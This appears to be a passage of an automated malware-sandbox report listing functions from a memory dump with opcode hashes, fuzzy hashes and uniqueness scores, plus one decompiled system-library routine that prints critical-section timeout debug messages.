                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ea2a0f93c0b97fc5d0a8a9009455a13d5a7ede70fc933c7c7ae0b22b2da3cabc
                                                                                                                                    • Instruction ID: 3afdade708fc76b441d0762c2aeacf1ec1b285ff12ab2f351dfd5ee3c8bbbb54
                                                                                                                                    • Opcode Fuzzy Hash: ea2a0f93c0b97fc5d0a8a9009455a13d5a7ede70fc933c7c7ae0b22b2da3cabc
                                                                                                                                    • Instruction Fuzzy Hash: 7B90027224100402F14171598404A06000DE7E0285F91C05BE0415558E8695DA66FEA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7B040, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 575374814434af3ccfe0ed1cfdb3c95d05be46d7ebbf4a3a9d0d510ea6b032a5
                                                                                                                                    • Instruction ID: 0a9303955df982464ef600e01aa41fb4670b66eb562721f1814cbb79dbe3651a
                                                                                                                                    • Opcode Fuzzy Hash: 575374814434af3ccfe0ed1cfdb3c95d05be46d7ebbf4a3a9d0d510ea6b032a5
                                                                                                                                    • Instruction Fuzzy Hash: 179002A2601140436540B15988048065019E7F1345391C16AE0445564C86A8D865E6A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B795F0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: abc61e31d954733041cc9ae2c6d233dadca061a44f18b880e90fc64b910c97be
                                                                                                                                    • Instruction ID: 164cf47cf9121142c21232f29b8221ea5bbc5cdd47d9a3f65d9cd4c7ec19449f
                                                                                                                                    • Opcode Fuzzy Hash: abc61e31d954733041cc9ae2c6d233dadca061a44f18b880e90fc64b910c97be
                                                                                                                                    • Instruction Fuzzy Hash: CD90027220100802F10471598804A860009D7E0345F51C05AE6015659E96A5D8A1B571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B799D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9de62eee57a758f91775641b78f348ea43c61f05c03f9d7421a2471cf36ab223
                                                                                                                                    • Instruction ID: 061eab6b7117b3701710803f973bf0b3a9edb76a0dfbc8c29bace1f02179df85
                                                                                                                                    • Opcode Fuzzy Hash: 9de62eee57a758f91775641b78f348ea43c61f05c03f9d7421a2471cf36ab223
                                                                                                                                    • Instruction Fuzzy Hash: 7D9002A221100042F10471598404B060049D7F1245F51C05BE2145558CC569DC71A565
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7AD30, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c7d33a92022828fd90bc3f31847570fbf812826012fbd4a83fc87c11d3486f47
                                                                                                                                    • Instruction ID: 2e5f2512769ed5d04048aa44e292fcfe562243f3dfa93fc708bb954344a382ff
                                                                                                                                    • Opcode Fuzzy Hash: c7d33a92022828fd90bc3f31847570fbf812826012fbd4a83fc87c11d3486f47
                                                                                                                                    • Instruction Fuzzy Hash: 82900272A0500012B14071598814A46400AE7F0785B55C05AE0505558C8994DA65A7E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79520, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f1ba4b9b2b644dea1d53b91e1399529d1405c27e6596e6925aa8a9af13167f5d
                                                                                                                                    • Instruction ID: 7045d73f9dbe8b6eaab636fc1541ad75255184be9cc1746b2490420bea6fb329
                                                                                                                                    • Opcode Fuzzy Hash: f1ba4b9b2b644dea1d53b91e1399529d1405c27e6596e6925aa8a9af13167f5d
                                                                                                                                    • Instruction Fuzzy Hash: 929002E2201140926500B259C404F0A4509D7F0245B51C05FE1045564CC565D861E575
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79560, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 01c09c6ff2684349480b2c432433e0c5da761fa8070ee52de926ddc99bff9fc1
                                                                                                                                    • Instruction ID: 81531f01350a15cc554c40c8d01ceef9f088294b13dde5ae6898850eb58168be
                                                                                                                                    • Opcode Fuzzy Hash: 01c09c6ff2684349480b2c432433e0c5da761fa8070ee52de926ddc99bff9fc1
                                                                                                                                    • Instruction Fuzzy Hash: F4900266221000022145B559460490B0449E7E6395391C05EF1407594CC661D875A761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79950, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 13c810bc4450a52f21ea8fdbc6de2a9721ff77372b4b2a6a29ea0d12ae8078d3
                                                                                                                                    • Instruction ID: 9c13821bd13c99dda847b46e516755ed47c00ebded0884a97584b4c262dbb2fa
                                                                                                                                    • Opcode Fuzzy Hash: 13c810bc4450a52f21ea8fdbc6de2a9721ff77372b4b2a6a29ea0d12ae8078d3
                                                                                                                                    • Instruction Fuzzy Hash: A99002A220140403F14075598804A070009D7E0346F51C05AE2055559E8A69DC61B575
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79A80, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 97917792ae2b890b79e7fd2381d41e29b5873b6d7d1281fc55ec018390f15ac9
                                                                                                                                    • Instruction ID: 123b8a5fb57620745753041ef9526f8908cc9fefd026a0f7f2c67e70ce63dc51
                                                                                                                                    • Opcode Fuzzy Hash: 97917792ae2b890b79e7fd2381d41e29b5873b6d7d1281fc55ec018390f15ac9
                                                                                                                                    • Instruction Fuzzy Hash: 8490026220144442F14072598804F0F4109D7F1246F91C05EE4147558CC955D865AB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B796D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14c9eae9ada9c1659a2f4b608dad683cba074690a1eaf482a0687197453b0243
                                                                                                                                    • Instruction ID: 9f01f7a02cebd32be27a2021fe4be68a72b753d2a386faa624e41e85c7960eb5
                                                                                                                                    • Opcode Fuzzy Hash: 14c9eae9ada9c1659a2f4b608dad683cba074690a1eaf482a0687197453b0243
                                                                                                                                    • Instruction Fuzzy Hash: B590027220100842F10071598404F460009D7F0345F51C05FE0115658D8655D861B961
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79610, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e5bdabf5f74bf300ef5c55a965c1afd1c72c8153cfa89622d00b259b8647feb4
                                                                                                                                    • Instruction ID: 4b52975a2fc691d21c38014da7244446f3d6602447026810ef66fd481d5cdde4
                                                                                                                                    • Opcode Fuzzy Hash: e5bdabf5f74bf300ef5c55a965c1afd1c72c8153cfa89622d00b259b8647feb4
                                                                                                                                    • Instruction Fuzzy Hash: 5490027260500802F15071598414B460009D7E0345F51C05AE0015658D8795DA65BAE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79A10, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6249d817ce2394a5f58c85951e81759fa99c621a8bac37056bae088f9504a051
                                                                                                                                    • Instruction ID: dfb5a71647cd9f255788eb898f650dd28d43f7bda4be00ddb1464ad61d452ddf
                                                                                                                                    • Opcode Fuzzy Hash: 6249d817ce2394a5f58c85951e81759fa99c621a8bac37056bae088f9504a051
                                                                                                                                    • Instruction Fuzzy Hash: E490027220140402F10071598808B470009D7E0346F51C05AE5155559E86A5D8A1B971
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79A00, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 00bec3f502c4cecbc8bea0465305a2012859c179e56c46c46c4d2451b17927d3
                                                                                                                                    • Instruction ID: c37ba3e91a2789e45ffd6030640dd0dc0301d1928ce802437cf1ad85b6539d09
                                                                                                                                    • Opcode Fuzzy Hash: 00bec3f502c4cecbc8bea0465305a2012859c179e56c46c46c4d2451b17927d3
                                                                                                                                    • Instruction Fuzzy Hash: 8D90027220140402F10071598814B0B0009D7E0346F51C05AE1155559D8665D861B9B1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79660, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 469548daab1ed725cd69050d85ad6b6969882a55b9ff7581fd1d57d702caca16
                                                                                                                                    • Instruction ID: dbb6df0b707b645887bea00c29f462308901208c6545c1d62d101db6cab9ee95
                                                                                                                                    • Opcode Fuzzy Hash: 469548daab1ed725cd69050d85ad6b6969882a55b9ff7581fd1d57d702caca16
                                                                                                                                    • Instruction Fuzzy Hash: 7190027220100802F18071598404A4A0009D7E1345F91C05EE0016658DCA55DA69BBE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79650, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 349141c7ef0144f523edf691df862e50e5b152ef1e50c264a454be4521d207dc
                                                                                                                                    • Instruction ID: 4c7cb81d289207a637439796752011a48021c6c11e9d717aaa89027af5833270
                                                                                                                                    • Opcode Fuzzy Hash: 349141c7ef0144f523edf691df862e50e5b152ef1e50c264a454be4521d207dc
                                                                                                                                    • Instruction Fuzzy Hash: F390027220504842F14071598404E460019D7E0349F51C05AE0055698D9665DD65FAA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8d1ea8c10c06b5c720055a7f53faf2471161d4518a093b5ec3a47a632133c3d8
                                                                                                                                    • Instruction ID: 9cb13abb92a4ae96efd4c04a14fb933106bc85ce4e87697d4d73524af253d0b6
                                                                                                                                    • Opcode Fuzzy Hash: 8d1ea8c10c06b5c720055a7f53faf2471161d4518a093b5ec3a47a632133c3d8
                                                                                                                                    • Instruction Fuzzy Hash: 6A90027220144002F1407159C444A0B5009E7F0345F51C45AE0416558C8655D866E661
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79730, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1319efdcf66410423f74ce97ea4418b0a469f7eea96ca2965de29ced167e296a
                                                                                                                                    • Instruction ID: 27fa375efb700ecdf9112b442c7f6bb00fe4bfa6509e2dbbc10c4fcbeea280e0
                                                                                                                                    • Opcode Fuzzy Hash: 1319efdcf66410423f74ce97ea4418b0a469f7eea96ca2965de29ced167e296a
                                                                                                                                    • Instruction Fuzzy Hash: 3890026260500402F14071599418B060019D7E0245F51D05AE0015558DC699DA65BAE1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7A710, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 56c43cdba292b0451c292a9477ff07fac2087b742b3c2f95c6a164e7b33aedcd
                                                                                                                                    • Instruction ID: 7b34bc31c6d3b15e65eaeb050d0fd94cbd1612a9fe3ec6fe74c6630c45319d30
                                                                                                                                    • Opcode Fuzzy Hash: 56c43cdba292b0451c292a9477ff07fac2087b742b3c2f95c6a164e7b33aedcd
                                                                                                                                    • Instruction Fuzzy Hash: E890027230100052B500B6999804E4A4109D7F0345B51D05EE4005558C8594D871A561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79B00, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 79d2b4a7c1aa80ae923aabdf66288b65ae4ff20657316b038524d3177e7d02c1
                                                                                                                                    • Instruction ID: d9997b244801c2295f9725a25b2609576aa7bec1a4f0610e08a92ba54824f2c3
                                                                                                                                    • Opcode Fuzzy Hash: 79d2b4a7c1aa80ae923aabdf66288b65ae4ff20657316b038524d3177e7d02c1
                                                                                                                                    • Instruction Fuzzy Hash: 3B90026224100802F1407159C414B07000AD7E0645F51C05AE0015558D8656D975BAF1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79770, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c4b05978af1f0242690eb37c53ba53c28c0c9804b9a1750ea0962d93ce0d1c04
                                                                                                                                    • Instruction ID: aa94ea34f2854ac81c3aac26655610f39fae3538e578e39ac5fff519037ffff9
                                                                                                                                    • Opcode Fuzzy Hash: c4b05978af1f0242690eb37c53ba53c28c0c9804b9a1750ea0962d93ce0d1c04
                                                                                                                                    • Instruction Fuzzy Hash: 2690026220504442F10075599408E060009D7E0249F51D05AE1055599DC675D861F571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7A770, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fcca8842bacfb885f0a8ecdb256d3c4cfd230cedd5f83249476a65b5598b3a7d
                                                                                                                                    • Instruction ID: d2676a8a671046e4b5bed48cbce2663bf2620ded0cf781e9d917be9659be61e6
                                                                                                                                    • Opcode Fuzzy Hash: fcca8842bacfb885f0a8ecdb256d3c4cfd230cedd5f83249476a65b5598b3a7d
                                                                                                                                    • Instruction Fuzzy Hash: D190027620504442F50075599804E870009D7E0349F51D45AE041559CD8694D871F561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79760, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3832e37d0b041408b45cd8099a861738b078411d3477bafbff3acaf39b568be4
                                                                                                                                    • Instruction ID: 40770086de1224bcedd56235397a28ad00393892d50f41d3f3eccfd01156d8eb
                                                                                                                                    • Opcode Fuzzy Hash: 3832e37d0b041408b45cd8099a861738b078411d3477bafbff3acaf39b568be4
                                                                                                                                    • Instruction Fuzzy Hash: B490027220100403F10071599508B070009D7E0245F51D45AE041555CDD696D861B561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79670, Relevance: .0, Instructions: 2COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction ID: 1399579d1129ea1dda0ea2f12224dd3f8cc66b4b6380c84d75a2d0b474b26a89
                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BCFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E04BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                    0x04bcfdda
                                                                                                                                    0x04bcfde2
                                                                                                                                    0x04bcfde5
                                                                                                                                    0x04bcfdec
                                                                                                                                    0x04bcfdfa
                                                                                                                                    0x04bcfdff
                                                                                                                                    0x04bcfe0a
                                                                                                                                    0x04bcfe0f
                                                                                                                                    0x04bcfe17
                                                                                                                                    0x04bcfe1e
                                                                                                                                    0x04bcfe19
                                                                                                                                    0x04bcfe19
                                                                                                                                    0x04bcfe19
                                                                                                                                    0x04bcfe20
                                                                                                                                    0x04bcfe21
                                                                                                                                    0x04bcfe22
                                                                                                                                    0x04bcfe25
                                                                                                                                    0x04bcfe40

                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BCFDFA
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BCFE2B
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BCFE01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
